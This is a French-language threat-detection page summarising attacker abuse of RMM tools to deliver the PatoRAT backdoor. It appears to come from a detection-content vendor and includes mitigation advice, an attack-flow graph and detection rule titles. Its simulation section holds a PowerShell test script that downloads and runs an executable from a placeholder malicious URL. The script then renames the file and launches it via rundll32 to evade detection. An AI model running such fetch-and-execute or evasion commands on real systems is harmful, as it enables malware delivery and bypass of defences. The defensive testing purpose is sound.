Suivre
Detection stack
- AIDR
- Alert
- ETL
- Query
Résumé
Les acteurs menaçants abusent de plus en plus des outils légitimes de surveillance et de gestion à distance (RMM) — tels que LogMeIn, PDQ Connect, Syncro, ScreenConnect, NinjaOne et SuperOps — pour distribuer des malwares et établir un accès distant persistant. La livraison initiale se fait souvent par le biais de pages de téléchargement malveillantes ou de courriels de phishing, suivie par une exécution par PowerShell et le déploiement de charges utiles secondaires comme la porte dérobée PatoRAT. AhnLab EDR peut détecter l’exécution de ces utilitaires RMM et générer des alertes comportementales autour des activités suivantes suspectes. Le rapport souligne l’importance de valider la provenance du logiciel et de maintenir une surveillance continue des points de terminaison.
Enquête
AhnLab Security Intelligence Center a observé plusieurs campagnes dans lesquelles les attaquants ont reconditionné ou déguisé les installateurs RMM en tant qu’applications populaires (par exemple, Notepad++, 7-Zip et Telegram) et les ont livrés via des sites Web malveillants ou des pièces jointes de phishing. Après l’installation, les agents RMM sont enregistrés sur l’infrastructure de leur fournisseur et sont ensuite utilisés pour exécuter des charges utiles PowerShell qui déposent PatoRAT. Une tactique similaire est apparue avec plusieurs produits RMM, y compris Syncro, livré par le biais de phishing avec des leurres PDF. La logique de détection AhnLab EDR a été développée pour signaler l’exécution de ces binaires autrement légitimes et la mettre en corrélation avec les comportements post-installation.
Atténuation
Vérifiez les sources de téléchargement, validez les certificats de signature de code et comparez les hachages avec les versions officielles des fournisseurs avant d’autoriser le logiciel RMM dans l’environnement. Appliquez une liste blanche d’applications et exigez des approbations explicites pour l’exécution de RMM. Surveillez les lancements inattendus de binaires RMM, l’activité anormale de PowerShell et les connexions suspectes aux domaines d’infrastructure des fournisseurs lorsque ces outils ne sont pas autorisés. Maintenez les systèmes d’exploitation et les outils de sécurité à jour pour réduire l’exposition.
Réponse
Lorsqu’une exécution suspecte de RMM est détectée, isolez l’hôte, collectez des artefacts forensiques et retirez le binaire non autorisé. Bloquez les connexions sortantes vers l’infrastructure de l’outil pour couper les canaux de contrôle à distance, et effectuez une analyse complète pour les charges utiles secondaires comme PatoRAT. Mettez à jour le contenu de détection avec les IOC observés et informez le SOC sur les motifs de la campagne pour un triage plus rapide.
« graph TB %% Class Definitions classDef action fill:#99ccff classDef technique fill:#ffcc99 classDef tool fill:#c2f0c2 classDef malware fill:#f9d5e5 %% Nodes node_initial_access[« <b>Action</b> – <b>T1204 User Execution</b>: Les victimes téléchargent des installateurs de RMM déguisés en logiciel légitime ou ouvrent des factures PDF de phishing qui redirigent vers des liens malveillants. »] class node_initial_access action node_masquerading[« <b>Technique</b> – <b>T1036.008 Masquerading</b>: Les installateurs et PDFs sont forgés pour apparaître comme des utilitaires ou documents de confiance. »] class node_masquerading technique node_rmt_install[« <b>Outil</b> – <b>Nom</b>: Outils d’accès à distance tels que LogMeIn Resolve, PDQ Connect, Syncro, ScreenConnect, NinjaOne, SuperOps. »] class node_rmt_install tool node_powerShell[« <b>Technique</b> – <b>T1059.001 PowerShell</b>: L’attaquant exécute des commandes PowerShell via la plateforme RMM pour télécharger et installer la porte dérobée PatoRAT. »] class node_powerShell technique node_patoRAT[« <b>Malware</b> – <b>Nom</b>: Porte dérobée PatoRAT. »] class node_patoRAT malware node_software_deployment[« <b>Technique</b> – <b>T1072 Outils de déploiement de logiciels</b>: Les solutions RMM sont utilisées pour déployer des charges utiles malveillantes supplémentaires et maintenir la persistance. »] class node_software_deployment technique node_lateral_exploit[« <b>Technique</b> – <b>T1210 Exploitation de services distants</b>: Les outils RMM compromis sont utilisés pour ouvrir des sessions distantes et se déplacer latéralement dans l’environnement. »] class node_lateral_exploit technique node_rdp_hijack[« <b>Technique</b> – <b>T1563.002 Détournement de session de service distant</b>: Le détournement de RDP est effectué pour prendre le contrôle d’hôtes supplémentaires. »] class node_rdp_hijack technique node_root_cert[« <b>Technique</b> – <b>T1553.004 Installation de certificat racine</b>: Des commandes PowerShell installent un certificat racine malveillant pour échapper aux contrôles de sécurité. »] class node_root_cert technique %% Connections node_initial_access u002du002d>|mène à| node_masquerading node_masquerading u002du002d>|mène à| node_rmt_install node_rmt_install u002du002d>|utilise| node_powerShell node_powerShell u002du002d>|installe| node_patoRAT node_patoRAT u002du002d>|active| node_software_deployment node_software_deployment u002du002d>|facilite| node_lateral_exploit node_lateral_exploit u002du002d>|active| node_rdp_hijack node_powerShell u002du002d>|exécute| node_root_cert «
Flux d’attaque
Détections
Logiciel d’accès / gestion à distance alternatif (via process_creation)
Voir
Tentative possible d’installation du logiciel SuperOps RMM (via file_event)
Voir
Logiciel d’accès / gestion à distance alternatif (via audit)
Voir
Logiciel d’accès / gestion à distance alternatif (via système)
Voir
Détection de l’exploitation de l’outil RMM pour la distribution de malware [Création de processus Windows]
Voir
Exécution de simulation
Prérequis : La vérification préalable de télémétrie et de ligne de base doit avoir réussi.
Justification : Cette section détaille l’exécution précise de la technique de l’adversaire (TTP) conçue pour déclencher la règle de détection. Les commandes et le récit DOIVENT refléter directement les TTP identifiés et viser à générer la télémétrie exacte attendue par la logique de détection. Des exemples abstraits ou non liés entraîneront un mauvais diagnostic.
-
Narration de l’attaque et commandes :
Un attaquant envoie un courriel de phishing contenant une pièce jointe malveillante. La pièce jointe exécute un script PowerShell qui télécharge le binaire RMMLogMeIn.exetoC:Temp. Pour échapper à la détection basée sur le nom, l’attaquant renomme le binaire entool.exeet le lance viarundll32.exe(T1216). Le binaire RMM contacte ensuite le serveur C2 contrôlé par l’attaquant et déploie une charge utile de porte dérobée. Après l’exécution, l’attaquant supprime le binaire (T1542.004) pour couvrir ses traces. -
Script de test de régression :
# --------------------------------------------------------------- # Simuler l'exploitation de l'outil RMM (nom original) – devrait déclencher # --------------------------------------------------------------- $rmmPath = "C:TempLogMeIn.exe" Invoke-WebRequest -Uri "https://example.com/malicious/LogMeIn.exe" -OutFile $rmmPath Write-Host "[*] Exécution du binaire RMM original (atténuation de l'alerte)..." Start-Process -FilePath $rmmPath -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Simuler l'évasion par le renommage et l'exécution par proxy – ne devrait PAS déclencher # --------------------------------------------------------------- $evasionPath = "C:Temptool.exe" Rename-Item -Path $rmmPath -NewName "tool.exe" Write-Host "[*] Exécution du binaire RMM renommé via rundll32 (évasion)..." $rundll = "$env:SystemRootSystem32rundll32.exe" Start-Process -FilePath $rundll -ArgumentList "`"$evasionPath`",#1" -WindowStyle Hidden Start-Sleep -Seconds 10 # --------------------------------------------------------------- # Nettoyage après simulation # --------------------------------------------------------------- Write-Host "[*] Nettoyage des binaires..." Remove-Item -Path $evasionPath -Force -ErrorAction SilentlyContinue Write-Host "[*] Simulation terminée." -
Commandes de nettoyage :
# Assurez-vous que tous les processus restants sont terminés Get-Process -Name "LogMeIn","tool" -ErrorAction SilentlyContinue | Stop-Process -Force # Supprimez tous les fichiers téléchargés (s'ils existent toujours) Remove-Item -Path "C:TempLogMeIn.exe","C:Temptool.exe" -Force -ErrorAction SilentlyContinue